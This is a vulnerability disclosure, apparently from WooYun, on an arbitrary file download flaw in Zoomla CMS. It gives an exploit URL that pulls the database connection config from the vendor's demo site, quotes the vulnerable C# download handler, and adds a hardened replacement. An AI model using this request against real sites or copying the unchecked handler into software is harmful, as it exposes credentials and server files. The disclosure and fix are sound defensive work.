
Zoomla CMS arbitrary file download (demonstrated on the official demo site)

2014-11-01 00:05

Config/ConnectionStrings.config is the database connection file. In fact, any file in the site can be downloaded the same way; only the filepath value has to be changed.

Code:
    http://demo.zoomla.cn/user/iServer/FiServerInfo.aspx?menu=filedown&filepath=//Config//ConnectionStrings.config

Referrer:

Code:
    http://demo.zoomla.cn/user/iServer/FiServer.aspx

[Screenshot: zoomla.PNG]

Proof of vulnerability:

The Page_Load handler behind FiServerInfo.aspx passes the filepath parameter straight to Server.MapPath without restricting it to any directory, so every file under the web root can be downloaded.

Code:
    protected void Page_Load(object sender, EventArgs e)
    {
        if (!string.IsNullOrEmpty(base.Request.QueryString["menu"]) && (base.Request.QueryString["menu"] == "filedown"))
        {
            string path = base.Request.QueryString["filepath"];
            if (path != "")
            {
                // filepath is mapped directly to a physical path: no base-directory or extension check
                FileInfo info = new FileInfo(base.Server.MapPath(path));
                if (info.Exists)
                {
                    base.Response.Clear();
                    base.Response.AddHeader("Content-Disposition", "attachment; filename=" + base.Server.UrlEncode(info.Name));
                    base.Response.AddHeader("Content-Length", info.Length.ToString());
                    base.Response.ContentType = "application/octet-stream";
                    base.Response.Filter.Close();
                    base.Response.WriteFile(info.FullName);
                    base.Response.End();
                }
                else
                {
                    base.Response.Write("<script>alert('该文件不存在!');history.go(-1);</script>");
                }
            }
        }
        if (!base.IsPostBack)
        {
            int questionId = DataConverter.CLng(base.Request.QueryString["QuestionId"]);
            this.MyBind(questionId);
            this.spfiletype.InnerHtml = SiteConfig.SiteOption.UploadFileExts;
        }
    }
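The handler above maps whatever arrives in filepath to a physical path and serves it if the file exists; a leading "/" makes Server.MapPath resolve from the application root, which is why Config/ConnectionStrings.config is reachable. The following is an added example of how the download branch can be hardened. It is not code from the WooYun report or from Zoomla's code base, and the names SafeDownload, DownloadRoot, ResolveAllowedPath and HandleDownload, as well as the extension list, are assumptions chosen for illustration. The control that matters is canonicalising the requested path and checking that it still lies inside one designated directory; the extension whitelist is a second, independent barrier.

```csharp
// Added example, not part of the original report or of Zoomla CMS.
// Hardened replacement for the "filedown" branch of Page_Load.
using System;
using System.IO;
using System.Linq;
using System.Web;

public static class SafeDownload
{
    // Hypothetical: the only virtual directory from which downloads are permitted.
    private const string DownloadRoot = "~/UploadFiles/";

    // Hypothetical whitelist. Anything not listed (.config, .aspx, .cs, .dll ...) is refused.
    private static readonly string[] AllowedExtensions =
        { ".zip", ".rar", ".pdf", ".doc", ".docx", ".jpg", ".png" };

    // Returns the absolute physical path when 'requested' resolves inside rootPhysical
    // and carries an allowed extension; otherwise null. Pure, so it is easy to unit-test.
    public static string ResolveAllowedPath(string rootPhysical, string requested)
    {
        if (string.IsNullOrWhiteSpace(requested)) return null;

        // Cheap early rejection of obvious traversal tokens and null bytes.
        if (requested.Contains("..") || requested.IndexOf('\0') >= 0) return null;

        string root, full;
        try
        {
            // Canonicalise both sides. GetFullPath collapses "." / ".." and normalises separators.
            // The trailing separator on root prevents "UploadFiles2" from matching "UploadFiles".
            root = Path.GetFullPath(rootPhysical.TrimEnd(Path.DirectorySeparatorChar, Path.AltDirectorySeparatorChar))
                   + Path.DirectorySeparatorChar;
            // Strip leading slashes so Path.Combine cannot treat the input as a rooted path.
            full = Path.GetFullPath(Path.Combine(root, requested.TrimStart('/', '\\')));
        }
        catch (ArgumentException)
        {
            // Invalid path characters: treat exactly like a traversal attempt.
            return null;
        }

        // Containment check: the resolved file must still be under the download root.
        if (!full.StartsWith(root, StringComparison.OrdinalIgnoreCase)) return null;

        // Extension whitelist: "ConnectionStrings.config" fails here even when placed under the root.
        string ext = Path.GetExtension(full);
        if (!AllowedExtensions.Contains(ext, StringComparer.OrdinalIgnoreCase)) return null;

        return full;
    }

    // Hypothetical body for the download branch of Page_Load.
    public static void HandleDownload(HttpResponse response, HttpServerUtility server, string requested)
    {
        string full = ResolveAllowedPath(server.MapPath(DownloadRoot), requested);
        if (full == null || !File.Exists(full))
        {
            // One generic failure for "rejected" and "missing": the response must not
            // reveal whether a file outside the root exists.
            response.StatusCode = 404;
            response.End();
            return;
        }

        FileInfo info = new FileInfo(full);
        response.Clear();
        response.AddHeader("Content-Disposition", "attachment; filename=" + server.UrlEncode(info.Name));
        response.AddHeader("Content-Length", info.Length.ToString());
        response.ContentType = "application/octet-stream";
        response.WriteFile(info.FullName);
        response.End();
    }
}
```

With this in place the request from the report resolves to a path under UploadFiles\Config\ that is both outside the intended files and carries a refused extension, so it receives the same 404 as a non-existent file. Requests that ResolveAllowedPath rejects are worth logging with the raw filepath value, since repeated rejections from one client are a clear signal of probing for this class of flaw.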

Fix:


Source: www.wooyun.org/bugs/wooyun-2014-070974
